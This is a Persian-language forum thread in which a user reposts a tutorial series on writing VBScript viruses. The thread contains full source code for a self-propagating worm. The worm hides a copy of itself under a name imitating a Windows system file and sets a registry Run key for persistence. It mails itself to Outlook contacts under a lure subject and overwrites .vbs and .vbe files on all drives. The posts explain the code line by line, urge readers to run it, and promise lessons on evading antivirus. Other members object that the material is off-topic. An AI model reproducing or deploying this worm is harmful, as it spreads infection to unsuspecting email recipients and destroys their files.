ويروس نويسي و انتي ويروس نويسي

[BabyBoy]

قول یه ویروس باحال هم بهتون میدم یه زره کارش مونده.
امیدوارم تا قبل از کنکور تمومش کنم.
اگه کسی بتونه درمورد انتشار ویروسها هم توی اینترنت و ... مطلب بدردبخوری بده ممنون میشم (البته نه چیزی که تو وبلاگها نوشته شده چون مشه گفت همه رو خوندم)

این تاپیک هم خراب نکنید .بزارید بیشتر سوال و جواب باشه نه کلکل و چرت و پرت
اگه خیلی به اینجور بحث ها علاقه دارید یه برنامه به اسمه Yahoo! Messenger ساخته شده که خیلی میتونه کمکتون کنه.

[double_n]

---------------- ویرایش شده توسط خودم --------------------

قربونت برم آراز جون که مقالاتت رو همه جا به اسم خودشون کپی می کنن

---------------- ویرایش شده توسط خودم --------------------

یکی از مدیران Delete بفرمایند

راستی - شما مدیری؟

[mazi_z_PSP]

بابا شما چتونه؟ خوب اینکه معلومه که اینارو خودم ننوشتم. خوب معلومه که از يه جايه ديگه گرفتم. ميخواستم به بقيه کسايی که اینارو نخوندن کمک کنم . اگر شما اینارو خوندين خوب بهشون هم کاری نداشته باشين.

[mazi_z_PSP]

---------------- ویرایش شده توسط خودم --------------------

قربونت برم آراز جون که مقالاتت رو همه جا به اسم خودشون کپی می کنن

---------------- ویرایش شده توسط خودم --------------------

یکی از مدیران Delete بفرمایند

خيلی گنگ حرف زدی.!! يعنی اینارو تو نوشتی؟ خوب اصلا به من چه. هرکی ميخواد نوشته باشه. من فقط خواستم اینارو به بقيه هم بدم

[mazi_z_PSP]

سلام بچه ها. امروز ديگه روز شماست, چون من ديگه از ياد دادن مطالب تئوری خسته شدم و ديگه می خوام شروع کنم. سيستم آموزش من‌ ــکه خودم هم همين طوری ياد گرفتم ــ به اين صورته که اول کد کامل ويروس رو می نويسم و بعد در مورد هر بخش اون به طور جداگانه توضيح می دم. البته هنوز چندتا مطلب ديگه در مورد ActiveX مونده بود ولی ديگه از خيرش گذشتيم. خوب کد يه ويروس نسبتا ساده VbScript به صورته زيره:

Dim Fso
Set Fso = CreateObject("Scripting.FileSystemObject")
WinDir = Fso.GetSpecialFolder(0)
VriPth = WinDir & "\COMDLG32.OCX.vbs"
Set WsShll = CreateObject("WScript.Shell")
WsShll.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\COMDLG32", "wscript.exe " & VriPth & " %"
Fso.CopyFile WScript.ScriptFullName, VriPath
Mailer()
Infecter()
'The Most Important Function ;-)
Function Mailer()
Dim AddressList, AdressLists, AddressEnteries
Set myOlApp = CreateObject("Outlook.Application")
Set myNameSpace = myOlApp.GetNameSpace("MAPI")
Set AddressLists = myNameSpace.AddressLists
For each Addresslist in AddressLists
Set AddressEntries = AddressList.AddressEntries
if AddressList.AddressEntries.Count <> 0 then
msgbox AddressList.AddressEntries.Count
For Num = 1 To 2
Set NewMail = myOlApp.CreateItem(0)
Set AddressEntery = AddressList.AddressEntries.Item(Num)
NewMail.To = AddressEntery.Address
NewMail.Subject = "Do U like War ?!!!"
NewMail.Body = "Hi "+ AddressEntery.Name + Chr(13) +" Veiw the Pics that I have Send u"
NewMail.Attachments.Add WScript.ScriptFullName
NewMail.DeleteAfterSubmit = True
If NewMail.To <> "" Then
NewMail.Send
End If
Next
End if
next
End Function
'The Infecter Function
Function Infecter()
Set Drives = Fso.Drives
For Each Drive in Drives
If Drive.IsReady Then
DoSearch(Drive)
End if
Next
End Function
'The DoSearch Function
Function DoSearch(Path)
Set Folder = Fso.GetFolder(Path)
Set Files = Folder.Files
For Each File in Files
If Fso.GetExtensionName(File.Path) = "vbs" Then
Checker(File.path,true)
End if
If Fso.GetExtensionName(File.Path) = "vbe" Then
Checker(File.path,true)
End if
Next
Set SubFs = Folder.SubFolders
For Each SubF in SubFs
DoSearch(Subf)
Next
End Function
Function Checker(Path)
Set VbFile = Fso.OpenTextFile(Path, 1, False)
VbText = VbFile.ReadAll
IsThere = InStr(1, VbText, MyText, 1)
If IsThere = 0 Then
Fso.CopyFile WScript.ScriptFullName, Path, True
End If
End Function

خوب با اين کد چی کار بايد کرد. شما می تونيد برای امتحان اينها رو در يه فايل با پسوند "vbs" ذخيره کنيد و ديگه کار تمومه. فقط کافيه روش کليک کنيد!. البته اگر يه ويروس ياب روی سيستمتون نصب باشه ممکنه سريعا بهش گيربده و نذاره شما اونو ذخيره کنيد. ولی من در مقالات بعدی طريقه مخفی کردن ويروس از چشم ضد ويروس هارو هم آموزش می دم پس زياد نگران نباشيد. و حالا نوبت ميرسه به توضيح بخش به بخش ويروس!!!!!
Dim Fso
Set Fso = CreateObject("Scripting.FileSystemObject")
WinDir = Fso.GetSpecialFolder(0)
VriPth = WinDir & "\COMDLG32.OCX.vbs"
از همين خط اول شروع می کنم! از Dim در VbScript برای... اه پس من اين سايت جديدم رو برای چی درست کردم خوب بيا بروتوش اول نکات ابتدايی VbScript مثل اعلان متغيرها و... رو ياد بگير بعد بيا از همين جا شروع کن (البته می تونی هم اينکارو نکنی بستگی داره به ضريب هوشی خودت ديگه که اينايی رو که من ميگم بگيری يا نه!). [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] . ديگه ماگفتيم! خوب خط بعدی همونطور که قبلا گفتم برای تعريف شئ File System Object هستش (که در اصل در VbScript برای استفاده از ActiveX ها از تابع ()CreateObject استفاده ميشه). خوب پس الان يه متغير جديد داريم که اون رو با يک شئ FSO مقدار دهی کرديم. در خط بعد از يکی از متدهای اين شئ بنام ()GetSpecialFolder استفاده شده. در اصل از اين متد برای بدست آوردن شاخه های اصلی ويندوز مثل System و يا خود شاخه ويندوز از اون استفاده ميشه. در اين متد بايد يه عدد رو به عنوان مقدار اوليه وارد کنيد (مقدار داخل پرانتز)‌که در اينجا صفر هستش که با وارد کردن اين مقدار تابع شاخه ويندوز را باز ميگرداند که در اينجا اين مقدار رشته ای باز گردانده شده در متغير WinDir قرار می گيرد. در VbScript با استفاده از علامت & و يا + می توان رشته ها را به هم الحاق داد. در خط بعد نيز متغيری بنام VriPth معرفی کرده ايم و آن را با رشته ای که برابر با مجموع دو رشته WinDir و "\COMDLG32.OCX.vbs" مقدار دهی کرده ايم. برای مثال اگر شاخه ويندوز شما به صورت "C:\Windows" در درايو سی قرار داشته باشد در دستور قبلی اين مقدار در متغيير WinDir قرار می گيرد و در اين خط نيز اين دورشته يعنی "C:\Windows" و "\COMDLG32.OCX.vbs" به يکديگر متصل می شوند و مقداری رشته ای برابر "C:\Window\COMDLG.OCX.vbs" در متغير Vripth قرار می گيرد. اين رشته در اصل همان مسيری است که ما می خواهيم يک نسخه از ويروسمان را با نام COMDLG32.OCX.vbs در کپی کنيم. شايد برای شما سوال پيش بياد که چرا می خواهيم نام فايل رو تغير بديم اونم به اين شکل. جواب اينکه شما اصلا می تونيد اين کار رو نکنيد و لی همين باعث می شه که اگر کاربر (قربانی) احتمالا اين فايل رو در شاخه ويندوز خودش ديد نگه من اصلا فايلی با اين اسم ندارم (اسمی که ممکنه شما مثلا خودتون انتخاب کنبد مثل amirviri.vbs)‌ اما اين نامی که من انتخاب کردم يکم گول زننده هستش و شبيه اسم يکی از فايل های اصلی ويندوز هست و ممکنه طرف بی خيال بشه. پس شما هم يکم هوشتون رو بکار بندازيد. خوب ديگه فکر کنم برای امروز بس باشه.بقيه شو فردا ياد می دم. بای

[Payman_62]

سلام.
mazi_z_MCSD این مطالبی که نوشتی چه ربطی به ویروس نویسی با ویبی داره؟
این جا انجمن ویبیه نه هک. هر مطلبی که تو هر وبلاگی پیدا میکنی که نباید این جا کپی پیست کنی.

[mazi_z_PSP]

سلام.
mazi_z_MCSD این مطالبی که نوشتی چه ربطی به ویروس نویسی با ویبی داره؟
این جا انجمن ویبیه نه هک. هر مطلبی که تو هر وبلاگی پیدا میکنی که نباید این جا کپی پیست کنی.

قربونت بشم منم ميدونم . اینا هم ويروس نويسی در وی بی رو ياد ميدن

[mazi_z_PSP]

ويروس های VbScript (قسمت پنجم)

سلام. امروز می خوام قسمت پنجم از سری مقلات "ويروس های VbScript" رو داشته باشم. فقط خداکنه مطالب قبلی يادتون نرفته باشه اگرم يادتون رفته فقط کافيه يه نگاه به اين مقلات قبلی بندازيد و بعد شروع کنيد‌ (منتظر بوديد من بگم نه؟). خوب در قسمت قبلی يعنی قسمت چهارم, کد کامل يه ويروس VbScript رو نوشتم و سه چهار خط اولش رو توضيح دادم. امروز هم می خوام چند خط بعدی رو توضيح بدم:

Set WsShll = CreateObject("WScript.Shell")
WsShll.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\COMDLG32", "wscript.exe " & VriPth & " %"
Fso.CopyFile Script.ScriptFullName,VriPathخوب کاربرد و نحوه استفاده شئ "WScript.Shell" رو که يه جورايی در قسمت سوم همين مقالات توضيح دادم و اينجا فقط برای يادآوری می گم در خط اول بااستفاده از تابع CreateObject يک شئ Shell تعريف می کنيم. در خط دوم از يکی از متدهای همين شئ بنام RegWrite استفاده شده. همونطور که از اسمش پيداست تابعی برای نوشتن مقادير در رجيستری می باشه و ما در ويروس خودمون برای اجرای ويروس در هر بار راه اندازی ويندوز احتياج به نوشتن مقادير جديد در رجيستری داريم. اين تابع دو مقدار ورودی داره (در VbScript برای جداکردن اين مقادير از هم از علامت " , " استفاده می شه), مقدار اول شاخه ای از رجيستری هستش که ما قصد داريم مقدار جديد رو در اون بنويسيم و مقدار دوم همون مقداره می باشد. که هر دوی اين ها مقادير رشته ای (يعنی رشته ای از حروف) هستند. در اين تابع ما برای ورودی اول مقدار رشته ای "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Run\COMDLG32" رو وارد کرديم. مقاديری که در اين شاخه Run رجيستری قرار می گيرند, در هربار راه اندازی ويندوز اجرا می شوند و ما از اين ترفند استفاده کرده ايم. در ورودی دوم مقدار "wscript.exe " & VriPth & " %" را قرار داده ايم. همونطور که در قسمت چهارم (قبلی)‌ توضيح دادم متغير VriPth حاوی آدرس فايلی هست که ما در اون قصد داريم يه کپی از ويروس خدومون رو قرار بديم (اين عمل در خط بعد انجام می گيره). البته برای اجرای فايل های vbs به صورت خط فرمان احتياج هست که دو مقدار رشته ای "wscript.exe " و " %" رو به اول و آخر آدرس فايل اضافه کنيم که در بالا هم اين کار انجام شده (اگه اين قسمت رو متوجه نشدی بگو!).در خط بعدی از يکی از متدهای شئ FSO (در قسمت دوم يا سوم توضيح دادم) بنام CopyFile استفاده شده. اين متد هم همونطور که از اسمش پيداست برای کپی کردن يک فايل در يه مسير ديگه استفاده می شه. که مثل تابع قبلی دو مقدار ورودی داره. اولی مسير فايل مبدا و دومی مسير فايل مقصد. در VbScript برای بدست آوردن مسير خود فايل vbs ( در اينجا يعنی همون مسيری که برای اولين بار ويروسمون رو اجرا می کنيم) از يکی از متدهای شئ جديدی بنام Script استفاده می شه. هيچ توضيحی برای اين شی لازم نيست چون در اينجا ما فقط با همين يه متد اون يعنی ScriptFullName کار داريم. پس برای مسير فايل مبدا که ويروس خودمون باشه مقدار Script.ScriptFullName (همون مسير رو بر ميگردونه) رو قرار می ديم و برای فايل مقصد هم که ورودی دوم هست متغير VriPth (در قسمت قبل مقاله توضيح دادم که چطور اين متغير را با آدرس فايلی در شاخه ويندوز مقدار دهی کنيم) رو قرار می ديم. پس طبق اين دو خط کد بالا يه کپی از فايل ويروس ما در شاخه ويندوز سيستم فرد قربانی بوجود مياد و آدرس اين کپی رو در شاخه مخصوصی از رجيستری قرار می ديم تا در هر بار راه اندازی ويندوز اجرا بشه. خوب ديگه داره خيلی بلند و بالا می شه و اين برای چشماتون ضرر داره پس بقيشو تو مقالات بعدی می گم. در ضمن اگر تاحالا قسمت های قبلی رو نخونديدسريعا همين امروز اين کار رو بکنيد چون همين امروز فردا ميرن تو آرشيو. / تا فردا يا حق!

[majj]

ويروس های VbScript (قسمت پنجم)

سلام. امروز می خوام قسمت پنجم از سری مقلات "ويروس های VbScript" رو داشته باشم. فقط خداکنه مطالب قبلی يادتون نرفته باشه اگرم يادتون رفته فقط کافيه يه نگاه به اين مقلات قبلی بندازيد و بعد شروع کنيد‌ (منتظر بوديد من بگم نه؟). خوب در قسمت قبلی يعنی قسمت چهارم, کد کامل يه ويروس VbScript رو نوشتم و سه چهار خط اولش رو توضيح دادم. امروز هم می خوام چند خط بعدی رو توضيح بدم:

Set WsShll = CreateObject("WScript.Shell")
WsShll.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\COMDLG32", "wscript.exe " & VriPth & " %"
Fso.CopyFile Script.ScriptFullName,VriPathخوب کاربرد و نحوه استفاده شئ "WScript.Shell" رو که يه جورايی در قسمت سوم همين مقالات توضيح دادم و اينجا فقط برای يادآوری می گم در خط اول بااستفاده از تابع CreateObject يک شئ Shell تعريف می کنيم. در خط دوم از يکی از متدهای همين شئ بنام RegWrite استفاده شده. همونطور که از اسمش پيداست تابعی برای نوشتن مقادير در رجيستری می باشه و ما در ويروس خودمون برای اجرای ويروس در هر بار راه اندازی ويندوز احتياج به نوشتن مقادير جديد در رجيستری داريم. اين تابع دو مقدار ورودی داره (در VbScript برای جداکردن اين مقادير از هم از علامت " , " استفاده می شه), مقدار اول شاخه ای از رجيستری هستش که ما قصد داريم مقدار جديد رو در اون بنويسيم و مقدار دوم همون مقداره می باشد. که هر دوی اين ها مقادير رشته ای (يعنی رشته ای از حروف) هستند. در اين تابع ما برای ورودی اول مقدار رشته ای "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Run\COMDLG32" رو وارد کرديم. مقاديری که در اين شاخه Run رجيستری قرار می گيرند, در هربار راه اندازی ويندوز اجرا می شوند و ما از اين ترفند استفاده کرده ايم. در ورودی دوم مقدار "wscript.exe " & VriPth & " %" را قرار داده ايم. همونطور که در قسمت چهارم (قبلی)‌ توضيح دادم متغير VriPth حاوی آدرس فايلی هست که ما در اون قصد داريم يه کپی از ويروس خدومون رو قرار بديم (اين عمل در خط بعد انجام می گيره). البته برای اجرای فايل های vbs به صورت خط فرمان احتياج هست که دو مقدار رشته ای "wscript.exe " و " %" رو به اول و آخر آدرس فايل اضافه کنيم که در بالا هم اين کار انجام شده (اگه اين قسمت رو متوجه نشدی بگو!).در خط بعدی از يکی از متدهای شئ FSO (در قسمت دوم يا سوم توضيح دادم) بنام CopyFile استفاده شده. اين متد هم همونطور که از اسمش پيداست برای کپی کردن يک فايل در يه مسير ديگه استفاده می شه. که مثل تابع قبلی دو مقدار ورودی داره. اولی مسير فايل مبدا و دومی مسير فايل مقصد. در VbScript برای بدست آوردن مسير خود فايل vbs ( در اينجا يعنی همون مسيری که برای اولين بار ويروسمون رو اجرا می کنيم) از يکی از متدهای شئ جديدی بنام Script استفاده می شه. هيچ توضيحی برای اين شی لازم نيست چون در اينجا ما فقط با همين يه متد اون يعنی ScriptFullName کار داريم. پس برای مسير فايل مبدا که ويروس خودمون باشه مقدار Script.ScriptFullName (همون مسير رو بر ميگردونه) رو قرار می ديم و برای فايل مقصد هم که ورودی دوم هست متغير VriPth (در قسمت قبل مقاله توضيح دادم که چطور اين متغير را با آدرس فايلی در شاخه ويندوز مقدار دهی کنيم) رو قرار می ديم. پس طبق اين دو خط کد بالا يه کپی از فايل ويروس ما در شاخه ويندوز سيستم فرد قربانی بوجود مياد و آدرس اين کپی رو در شاخه مخصوصی از رجيستری قرار می ديم تا در هر بار راه اندازی ويندوز اجرا بشه. خوب ديگه داره خيلی بلند و بالا می شه و اين برای چشماتون ضرر داره پس بقيشو تو مقالات بعدی می گم. در ضمن اگر تاحالا قسمت های قبلی رو نخونديدسريعا همين امروز اين کار رو بکنيد چون همين امروز فردا ميرن تو آرشيو. / تا فردا يا حق!

پس بقیش کو

[mazi_z_PSP]

پس بقیش کو

بابا خب واستا. هنوز بقيشو درست نخوندی منتظر بعدی هستی؟